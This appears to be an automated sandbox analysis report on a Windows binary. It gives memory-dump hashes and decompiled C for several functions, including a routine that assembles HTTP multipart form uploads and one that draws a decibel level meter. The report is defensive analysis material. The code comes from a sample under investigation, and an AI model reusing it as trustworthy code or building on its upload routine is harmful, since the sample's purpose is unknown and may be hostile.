                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: b345abad6effc45c0cbb84b48b158672e45d54553e0d46f7d8c2a416a1b75d2d
                                                                                                                                                      • Instruction ID: b43c7b1bc87f947e21621f9e1e5b51c3c2753294295e3ab8e435aed6927b1f5f
                                                                                                                                                      • Opcode Fuzzy Hash: b345abad6effc45c0cbb84b48b158672e45d54553e0d46f7d8c2a416a1b75d2d
                                                                                                                                                      • Instruction Fuzzy Hash: 20317236A609164BE70CCB28DCB3AB93690E784345F89913DE94BCB3D1DE2D9900C744
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000E380, Relevance: .1, Instructions: 76COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                      • Instruction ID: 3d64114236e2f6cf37ce8917a46a3af8ec6341702dac82c8498a2a11d88d9f97
                                                                                                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                      • Instruction Fuzzy Hash: 18115E772041C283F680C93DD8B85ABEBDAEBC53E073943BAD0426B65CC222EE419600
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 100083F0, Relevance: .1, Instructions: 71COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 93263c2f41e7a84bd9f3f1fe17f765076f141bc4a56e9309b850ac5ad24851b2
                                                                                                                                                      • Instruction ID: 422f8650b557b8f9c1a593025372a0152a0a34ea2c84febd6a26ca963c529ba3
                                                                                                                                                      • Opcode Fuzzy Hash: 93263c2f41e7a84bd9f3f1fe17f765076f141bc4a56e9309b850ac5ad24851b2
                                                                                                                                                      • Instruction Fuzzy Hash: 6821FF73D547374BE361E969DC043623392FBC4389F1A8574EE905BB4AD639AA0387D0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10008340, Relevance: .1, Instructions: 60COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 61305255b481cac513ca91d6198e57c4f9bc9d105d2506bd85ce044ab558657f
                                                                                                                                                      • Instruction ID: ceac63d603e695a7317e3239a0cf6935383fd7410ed1c39e900c1bcb7fa277c9
                                                                                                                                                      • Opcode Fuzzy Hash: 61305255b481cac513ca91d6198e57c4f9bc9d105d2506bd85ce044ab558657f
                                                                                                                                                      • Instruction Fuzzy Hash: AF110272654B264EE321D97DDC50773B3D2FBC1695F5A8929DAD28330CE939AB008310
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019DE0, Relevance: .0, Instructions: 14COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: fcb5b8d722a8140dbf32dbae953001c1121db2f258d5d916192a685ee3fa6d34
                                                                                                                                                      • Instruction ID: 400514f795efa1174e6a2b3ff4f6cc3dc550215f7dc1e9ae67a216db31666afb
                                                                                                                                                      • Opcode Fuzzy Hash: fcb5b8d722a8140dbf32dbae953001c1121db2f258d5d916192a685ee3fa6d34
                                                                                                                                                      • Instruction Fuzzy Hash: 65D0A93291620CEFC700CF94C902B8EB3F8E700340F1040A8E80487200D2399F10DA81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019ED0, Relevance: .0, Instructions: 14COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 68cc0d9f7c837baba5d84efb1518d219cd5a9d155d3a346d5a5021a63293fcbc
                                                                                                                                                      • Instruction ID: afa243e2bbc7d5b73eef9c76600441106c915adb5c9f305da66005335667999b
                                                                                                                                                      • Opcode Fuzzy Hash: 68cc0d9f7c837baba5d84efb1518d219cd5a9d155d3a346d5a5021a63293fcbc
                                                                                                                                                      • Instruction Fuzzy Hash: FCD0A92059D2CC6ECB02CBB88411BA9BFF88716600F0802C4E888C3382C02A820983A1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10021460, Relevance: 48.4, APIs: 32, Instructions: 449COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                      			E10021460(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36) {
				char _v8;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				char _v28;
				char _v543;
				char _v544;
				char _v807;
				char _v808;
				char* _v812;
				char _v1079;
				char _v1080;
				char* _v1084;
				char* _v1088;
				char _v1599;
				char _v1600;
				intOrPtr _v1604;
				char _v15703;
				char _v15704;
				char* _v15708;
				char _v29807;
				char _v29808;
				char* _v29812;
				char _v43911;
				char _v43912;
				char _v58007;
				char _v58008;
				char _v58024;
				char _v58052;
				char _v58080;
				char _v58084;
				void* __esi;
				void* _t172;
				intOrPtr _t179;
				void* _t186;
				void* _t195;
				void* _t216;
				void* _t218;
				void* _t237;
				void* _t254;
				intOrPtr _t297;
				intOrPtr _t357;
				void* _t359;
				void* _t366;
				void* _t376;
				void* _t385;
				void* _t392;

				_t353 = __edi;
				_t265 = __ebx;
				_push(0xffffffff);
				_push(E10022B1C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t357;
				E10018AA0(0xe2d4);
				_push(_t354);
				_v24 = 0;
				_v28 = "--";
				if(_a16 != 0 && _a20 != 0 && _a24 != 0 && _a28 != 0 && _a32 > 0) {
					_v812 = "Content-Disposition: form-data; name=\"%s\"; %s=\"%s\"";
					_v1084 = "Content-Type: %s";
					_v1088 = "%s%s\r\n%s\r\n%s\r\n\r\n";
					_v808 = 0;
					E1000CF20(__edi,  &_v807, 0, 0x103);
					_v1080 = 0;
					E1000CF20(_t353,  &_v1079, 0, 0x103);
					_v1600 = 0;
					E1000CF20(_t353,  &_v1599, 0, 0x1ff);
					_push(_a20);
					_push(_a16);
					E1000CC93(_t353,  &_v808, _v812, _a16);
					E1000CC93(_t353,  &_v1080, _v1084, _a24);
					_push( &_v1080);
					_push( &_v808);
					_push(_a4);
					E1000CC93(_t353,  &_v1600, _v1088, _v28);
					_t392 = _t357 + 0x5c;
					if( *_a36 != 0) {
						E1000D190(__ebx, _t353, _t354,  *_a36 + _v24,  &_v1600, E1000CAC0( &_v1600));
						_t392 = _t392 + 0x10;
					}
					_t254 = E1000CAC0( &_v1600);
					_t357 = _t392 + 4;
					_v24 = _t254 + _v24;
					if( *_a36 != 0) {
						E1000D190(_t265, _t353, _t354,  *_a36 + _v24, _a28, _a32);
						_t357 = _t357 + 0xc;
					}
					_v24 = _v24 + _a32;
				}
				if(_a8 != 0 && _a12 > 0) {
					_t172 = E10001A50(_a8, "=");
					_t357 = _t357 + 8;
					if(_t172 != 0) {
						_v15708 = "Content-Disposition: form-data; name=\"%s\"";
						_v29812 = "\r\n%s%s\r\n%s\r\n\r\n%s";
						_v58008 = 0;
						E1000CF20(_t353,  &_v58007, 0, 0x370f);
						_v29808 = 0;
						E1000CF20(_t353,  &_v29807, 0, 0x370f);
						_v43912 = 0;
						E1000CF20(_t353,  &_v43911, 0, 0x370f);
						_v15704 = 0;
						E1000CF20(_t353,  &_v15703, 0, 0x370f);
						_t179 = E10001A50(_a8, "&");
						_t366 = _t357 + 0x38;
						_v1604 = _t179;
						if(_v1604 != 0) {
							E10001160( &_v58052, __eflags, _a8);
							_v8 = 0;
							E10002FE0( &_v58024, __eflags);
							_v8 = 1;
							E10001160( &_v58080, __eflags, "&");
							_v8 = 2;
							E1001A850(__eflags,  &_v58052,  &_v58024,  &_v58080);
							_t357 = _t366 + 0xc;
							_v58084 = 0;
							while(1) {
								_t186 = E100021E0( &_v58024);
								__eflags = _v58084 - _t186;
								if(_v58084 >= _t186) {
									break;
								}
								E1000CF20(_t353,  &_v43912, 0, 0x3710);
								E1000CF20(_t353,  &_v15704, 0, 0x3710);
								_t195 = E10001A50(E100011E0(E10003030( &_v58024, __eflags, _v58084)), "=");
								_t354 = _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084));
								E1000D190(_t265, _t353, _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084)),  &_v43912, E100011E0(E10003030( &_v58024, __eflags, _v58084)), _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084)));
								E1000D8A3(_v58084,  &_v15704, 0x3710, E10001A50(E100011E0(E10003030( &_v58024, __eflags, _v58084)), "=") + 1);
								E1000CF20(_t353,  &_v58008, 0, 0x3710);
								E1000CF20(_t353,  &_v29808, 0, 0x3710);
								E1000CC93(_t353,  &_v58008, _v15708,  &_v43912);
								_push( &_v15704);
								_push( &_v58008);
								_push(_a4);
								E1000CC93(_t353,  &_v29808, _v29812, _v28);
								_t376 = _t357 + 0x7c;
								__eflags =  *_a36;
								if( *_a36 != 0) {
									_t218 = E1000CAC0( &_v29808);
									__eflags =  *_a36 + _v24;
									E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, _t218);
									_t376 = _t376 + 0x10;
								}
								_t216 = E1000CAC0( &_v29808);
								_t357 = _t376 + 4;
								_v24 = _t216 + _v24;
								_t297 = _v58084 + 1;
								__eflags = _t297;
								_v58084 = _t297;
							}
							_v8 = 1;
							E100011A0( &_v58080);
							_v8 = 0;
							E10003010( &_v58024);
							_v8 = 0xffffffff;
							E100011A0( &_v58052);
						} else {
							E1000D190(_t265, _t353, _t354,  &_v43912, _a8, E10001A50(_a8, "=") - _a8);
							E1000D8A3(_a8,  &_v15704, 0x3710, E10001A50(_a8, "=") + 1);
							E1000CF20(_t353,  &_v58008, 0, 0x3710);
							E1000CF20(_t353,  &_v29808, 0, 0x3710);
							E1000CC93(_t353,  &_v58008, _v15708,  &_v43912);
							_push( &_v15704);
							_push( &_v58008);
							_push(_a4);
							E1000CC93(_t353,  &_v29808, _v29812, _v28);
							_t385 = _t366 + 0x64;
							if( *_a36 != 0) {
								E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, E1000CAC0( &_v29808));
								_t385 = _t385 + 0x10;
							}
							_t237 = E1000CAC0( &_v29808);
							_t357 = _t385 + 4;
							_v24 = _t237 + _v24;
						}
					}
				}
				_v20 = "\r\n%s%s%s\r\n";
				_v544 = 0;
				E1000CF20(_t353,  &_v543, 0, 0x1ff);
				_push(_v28);
				_push(_a4);
				E1000CC93(_t353,  &_v544, _v20, _v28);
				_t359 = _t357 + 0x20;
				if( *_a36 != 0) {
					E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v544, E1000CAC0( &_v544));
					_t359 = _t359 + 0x10;
				}
				_v24 = E1000CAC0( &_v544) + _v24;
				 *[fs:0x0] = _v16;
				return _v24;
			}


















































                                                                                                                                                      0x10021460
                                                                                                                                                      0x10021460
                                                                                                                                                      0x10021463
                                                                                                                                                      0x10021465
                                                                                                                                                      0x10021470
                                                                                                                                                      0x10021471
                                                                                                                                                      0x1002147d
                                                                                                                                                      0x10021482
                                                                                                                                                      0x10021483
                                                                                                                                                      0x1002148a
                                                                                                                                                      0x10021495
                                                                                                                                                      0x100214c3
                                                                                                                                                      0x100214cd
                                                                                                                                                      0x100214d7
                                                                                                                                                      0x100214e1
                                                                                                                                                      0x100214f6
                                                                                                                                                      0x100214fe
                                                                                                                                                      0x10021513
                                                                                                                                                      0x1002151b
                                                                                                                                                      0x10021530
                                                                                                                                                      0x1002153b
                                                                                                                                                      0x1002153f
                                                                                                                                                      0x10021552
                                                                                                                                                      0x1002156c
                                                                                                                                                      0x1002157a
                                                                                                                                                      0x10021581
                                                                                                                                                      0x10021585
                                                                                                                                                      0x10021598
                                                                                                                                                      0x1002159d
                                                                                                                                                      0x100215a6
                                                                                                                                                      0x100215c8
                                                                                                                                                      0x100215cd
                                                                                                                                                      0x100215cd
                                                                                                                                                      0x100215d7
                                                                                                                                                      0x100215dc
                                                                                                                                                      0x100215e2
                                                                                                                                                      0x100215eb
                                                                                                                                                      0x100215fe
                                                                                                                                                      0x10021603
                                                                                                                                                      0x10021603
                                                                                                                                                      0x1002160c
                                                                                                                                                      0x1002160c
                                                                                                                                                      0x10021613
                                                                                                                                                      0x1002162c
                                                                                                                                                      0x10021631
                                                                                                                                                      0x10021636
                                                                                                                                                      0x1002163c
                                                                                                                                                      0x10021646
                                                                                                                                                      0x10021650
                                                                                                                                                      0x10021665
                                                                                                                                                      0x1002166d
                                                                                                                                                      0x10021682
                                                                                                                                                      0x1002168a
                                                                                                                                                      0x1002169f
                                                                                                                                                      0x100216a7
                                                                                                                                                      0x100216bc
                                                                                                                                                      0x100216cd
                                                                                                                                                      0x100216d2
                                                                                                                                                      0x100216d5
                                                                                                                                                      0x100216e2
                                                                                                                                                      0x10021802
                                                                                                                                                      0x10021807
                                                                                                                                                      0x10021814
                                                                                                                                                      0x10021819
                                                                                                                                                      0x10021828
                                                                                                                                                      0x1002182d
                                                                                                                                                      0x10021846
                                                                                                                                                      0x1002184b
                                                                                                                                                      0x1002184e
                                                                                                                                                      0x10021869
                                                                                                                                                      0x1002186f
                                                                                                                                                      0x10021874
                                                                                                                                                      0x1002187a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1002188e
                                                                                                                                                      0x100218a4
                                                                                                                                                      0x100218cb
                                                                                                                                                      0x100218ee
                                                                                                                                                      0x10021912
                                                                                                                                                      0x10021951
                                                                                                                                                      0x10021967
                                                                                                                                                      0x1002197d
                                                                                                                                                      0x1002199a
                                                                                                                                                      0x100219a8
                                                                                                                                                      0x100219af
                                                                                                                                                      0x100219b3
                                                                                                                                                      0x100219c6
                                                                                                                                                      0x100219cb
                                                                                                                                                      0x100219d1
                                                                                                                                                      0x100219d4
                                                                                                                                                      0x100219dd
                                                                                                                                                      0x100219f2
                                                                                                                                                      0x100219f6
                                                                                                                                                      0x100219fb
                                                                                                                                                      0x100219fb
                                                                                                                                                      0x10021a05
                                                                                                                                                      0x10021a0a
                                                                                                                                                      0x10021a10
                                                                                                                                                      0x10021860
                                                                                                                                                      0x10021860
                                                                                                                                                      0x10021863
                                                                                                                                                      0x10021863
                                                                                                                                                      0x10021a18
                                                                                                                                                      0x10021a22
                                                                                                                                                      0x10021a27
                                                                                                                                                      0x10021a31
                                                                                                                                                      0x10021a36
                                                                                                                                                      0x10021a43
                                                                                                                                                      0x100216e8
                                                                                                                                                      0x10021708
                                                                                                                                                      0x10021731
                                                                                                                                                      0x10021747
                                                                                                                                                      0x1002175d
                                                                                                                                                      0x1002177a
                                                                                                                                                      0x10021788
                                                                                                                                                      0x1002178f
                                                                                                                                                      0x10021793
                                                                                                                                                      0x100217a6
                                                                                                                                                      0x100217ab
                                                                                                                                                      0x100217b4
                                                                                                                                                      0x100217d6
                                                                                                                                                      0x100217db
                                                                                                                                                      0x100217db
                                                                                                                                                      0x100217e5
                                                                                                                                                      0x100217ea
                                                                                                                                                      0x100217f0
                                                                                                                                                      0x100217f0
                                                                                                                                                      0x100216e2
                                                                                                                                                      0x10021636
                                                                                                                                                      0x10021a48
                                                                                                                                                      0x10021a4f
                                                                                                                                                      0x10021a64
                                                                                                                                                      0x10021a6f
                                                                                                                                                      0x10021a73
                                                                                                                                                      0x10021a83
                                                                                                                                                      0x10021a88
                                                                                                                                                      0x10021a91
                                                                                                                                                      0x10021ab3
                                                                                                                                                      0x10021ab8
                                                                                                                                                      0x10021ab8
                                                                                                                                                      0x10021acd
                                                                                                                                                      0x10021ad6
                                                                                                                                                      0x10021ae1

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_sprintf_strlen$_strcpy_s$__flsbuf__output_l
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 854390245-0
                                                                                                                                                      • Opcode ID: 910685c5451b4cc4cbd4e9e1085cb89c7aa0c32abf0c4b0acda8ecd3dc8b06fe
                                                                                                                                                      • Instruction ID: 2d82e108429a1e59b14db5b6321f6623d8f234d0aa847db4e2dbab4e051ccd9c
                                                                                                                                                      • Opcode Fuzzy Hash: 910685c5451b4cc4cbd4e9e1085cb89c7aa0c32abf0c4b0acda8ecd3dc8b06fe
                                                                                                                                                      • Instruction Fuzzy Hash: BC0290B6D00218ABDB10DB90DC82FDE777DEB58340F4445A8F509A7285EB74AB44CFA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00401390, Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 242COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 71%
                                                                                                                                                      			E00401390(signed long long __fp0) {
				void* __ebx;
				void* _t79;
				signed long long _t87;
				signed char _t88;
				signed long long _t89;
				int _t94;
				int _t97;
				int _t115;
				int _t118;
				void* _t126;
				int _t127;
				int _t142;
				signed char _t156;
				void* _t159;
				struct HDC__* _t162;
				signed long long _t163;
				signed long long* _t164;
				signed long long* _t165;
				long long* _t166;

				_t172 = __fp0;
				_t126 = SelectObject;
				_t163 = _t164[0x17];
				_t162 = _t164[0x18];
				_t79 = SelectObject(_t162,  *(_t163 + 0x18));
				_t127 =  *(_t163 + 0x20);
				_t164[5] = _t79;
				_t164[7] = SelectObject(_t162, _t127);
				_t164[7] = SelectObject(_t162, GetStockObject(8));
				SetBkMode(_t162, 1);
				SetTextColor(_t162, 0);
				_t164[3] = 0x19;
				_t164[3] = 0x96;
				_t164[4] = 0xaf;
				_t164[4] = 0xa7;
				_t142 = _t163 + 0x84;
				if( *((intOrPtr*)(_t163 + 0x28)) != 0) {
					_t164[2] = _t142;
					_t164[5] = 8;
					do {
						_t87 =  *(_t164[2]);
						_t164[6] = _t87;
						if(_t87 <= 1) {
							_t164[2] = 0xc3140000;
						} else {
							asm("fild dword [esp+0x34]");
							asm("fldlg2");
							asm("fxch st0, st1");
							asm("fyl2x");
							_t164[2] = _t172 *  *0x40b200 *  *0x40b1f8;
						}
						_t88 = E00403774();
						_t156 = _t88;
						if(_t156 >= 0) {
							if(_t156 <= 0x96) {
								if(_t156 > 0) {
									goto L17;
								}
							} else {
								_t156 = 0x96;
								L17:
								SelectObject(_t162,  *(_t163 + 0x24));
								_t52 = _t164[3] + 1; // 0x1
								_t127 = _t156 + _t52;
								_t88 = Rectangle(_t162, _t164[3], _t164[4], _t127, _t164[4]);
							}
							if(_t156 < 0x96) {
								goto L19;
							}
						} else {
							_t156 = 0;
							L19:
							SelectObject(_t162,  *(_t163 + 0x20));
							_t127 = _t164[3];
							_t88 = Rectangle(_t162, _t156 + _t127, _t164[3], _t164[4] + 1, _t164[4]);
						}
						_t172 = _t164[2];
						asm("fcomp dword [0x40b1ec]");
						asm("fnstsw ax");
						if((_t88 & 0x00000041) != 0) {
							_t89 = "-inf db"; // 0x666e692d
							_t127 =  *0x40d1d4; // 0x626420
							_t164[7] = _t89;
							_t164[8] = _t127;
						} else {
							_t172 = _t164[2];
							_t165 = _t164 - 8;
							 *_t165 = _t172;
							_push("%0.1f db");
							_push( &(_t165[8]));
							E004036D0(_t126,  &(_t165[8]));
							_t164 =  &(_t165[2]);
						}
						asm("repne scasb");
						DrawTextA(_t162,  &(_t164[8]),  !(_t127 | 0xffffffff) - 1,  &(_t164[3]), 0x25);
						_t94 = _t164[3] + 0x11;
						_t127 = _t164[2] + 4;
						_t164[3] = _t94;
						_t164[4] = _t94 + 0x11;
						_t97 = _t164[5] - 1;
						_t164[2] = _t127;
						_t164[5] = _t97;
					} while (_t97 != 0);
				} else {
					_t164[2] = _t142;
					_t164[5] = 8;
					do {
						asm("fild dword [eax]");
						asm("fst dword [esp+0x14]");
						_t159 = E00403774();
						if(_t159 > 0) {
							SelectObject(_t162,  *(_t163 + 0x24));
							_t22 = _t164[3] + 1; // 0x1
							_t127 = _t159 + _t22;
							Rectangle(_t162, _t164[3], _t164[4], _t127, _t164[4]);
						}
						if(_t159 < 0x96) {
							SelectObject(_t162,  *(_t163 + 0x20));
							_t127 = _t164[3];
							Rectangle(_t162, _t159 + _t127, _t164[3], _t164[4] + 1, _t164[4]);
						}
						_t172 = _t164[2];
						_t166 = _t164 - 8;
						 *_t166 = _t164[2];
						_push("%0.1f %%");
						_push(_t166 + 0x44);
						E004036D0(_t126, _t166 + 0x44);
						_t164 = _t166 + 0x10;
						asm("repne scasb");
						DrawTextA(_t162,  &(_t164[9]),  !(_t127 | 0xffffffff) - 1,  &(_t164[3]), 0x25);
						_t115 = _t164[3] + 0x11;
						_t127 = _t164[2] + 4;
						_t164[3] = _t115;
						_t164[4] = _t115 + 0x11;
						_t118 = _t164[5] - 1;
						_t164[2] = _t127;
						_t164[5] = _t118;
					} while (_t118 != 0);
				}
				SelectObject(_t162, _t164[5]);
				SelectObject(_t162, _t164[7]);
				return SelectObject(_t162, _t164[6]);
			}






















                                                                                                                                                      0x00401390
                                                                                                                                                      0x00401397
                                                                                                                                                      0x0040139e
                                                                                                                                                      0x004013a6
                                                                                                                                                      0x004013b3
                                                                                                                                                      0x004013b5
                                                                                                                                                      0x004013b8
                                                                                                                                                      0x004013c5
                                                                                                                                                      0x004013d7
                                                                                                                                                      0x004013db
                                                                                                                                                      0x004013e4
                                                                                                                                                      0x004013ed
                                                                                                                                                      0x004013f7
                                                                                                                                                      0x004013ff
                                                                                                                                                      0x00401407
                                                                                                                                                      0x0040140f
                                                                                                                                                      0x00401415
                                                                                                                                                      0x00401502
                                                                                                                                                      0x00401506
                                                                                                                                                      0x0040150a
                                                                                                                                                      0x0040150e
                                                                                                                                                      0x00401513
                                                                                                                                                      0x00401517
                                                                                                                                                      0x00401535
                                                                                                                                                      0x00401519
                                                                                                                                                      0x00401519
                                                                                                                                                      0x00401523
                                                                                                                                                      0x00401525
                                                                                                                                                      0x00401527
                                                                                                                                                      0x0040152f
                                                                                                                                                      0x0040152f
                                                                                                                                                      0x0040154d
                                                                                                                                                      0x00401552
                                                                                                                                                      0x00401556
                                                                                                                                                      0x00401562
                                                                                                                                                      0x0040156d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401564
                                                                                                                                                      0x00401564
                                                                                                                                                      0x0040156f
                                                                                                                                                      0x00401574
                                                                                                                                                      0x00401583
                                                                                                                                                      0x00401583
                                                                                                                                                      0x0040158b
                                                                                                                                                      0x0040158b
                                                                                                                                                      0x00401597
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401558
                                                                                                                                                      0x00401558
                                                                                                                                                      0x00401599
                                                                                                                                                      0x0040159e
                                                                                                                                                      0x004015ad
                                                                                                                                                      0x004015b8
                                                                                                                                                      0x004015b8
                                                                                                                                                      0x004015be
                                                                                                                                                      0x004015c2
                                                                                                                                                      0x004015c8
                                                                                                                                                      0x004015cd
                                                                                                                                                      0x004015ed
                                                                                                                                                      0x004015f2
                                                                                                                                                      0x004015f8
                                                                                                                                                      0x004015fc
                                                                                                                                                      0x004015cf
                                                                                                                                                      0x004015cf
                                                                                                                                                      0x004015d3
                                                                                                                                                      0x004015da
                                                                                                                                                      0x004015dd
                                                                                                                                                      0x004015e2
                                                                                                                                                      0x004015e3
                                                                                                                                                      0x004015e8
                                                                                                                                                      0x004015e8
                                                                                                                                                      0x0040160d
                                                                                                                                                      0x0040161c
                                                                                                                                                      0x0040162a
                                                                                                                                                      0x0040162d
                                                                                                                                                      0x00401630
                                                                                                                                                      0x00401637
                                                                                                                                                      0x0040163f
                                                                                                                                                      0x00401640
                                                                                                                                                      0x00401644
                                                                                                                                                      0x00401644
                                                                                                                                                      0x0040141b
                                                                                                                                                      0x0040141b
                                                                                                                                                      0x0040141f
                                                                                                                                                      0x00401423
                                                                                                                                                      0x00401427
                                                                                                                                                      0x0040142f
                                                                                                                                                      0x0040143e
                                                                                                                                                      0x00401442
                                                                                                                                                      0x00401449
                                                                                                                                                      0x00401458
                                                                                                                                                      0x00401458
                                                                                                                                                      0x00401460
                                                                                                                                                      0x00401460
                                                                                                                                                      0x0040146c
                                                                                                                                                      0x00401473
                                                                                                                                                      0x00401482
                                                                                                                                                      0x0040148d
                                                                                                                                                      0x0040148d
                                                                                                                                                      0x00401493
                                                                                                                                                      0x00401497
                                                                                                                                                      0x0040149e
                                                                                                                                                      0x004014a1
                                                                                                                                                      0x004014a6
                                                                                                                                                      0x004014a7
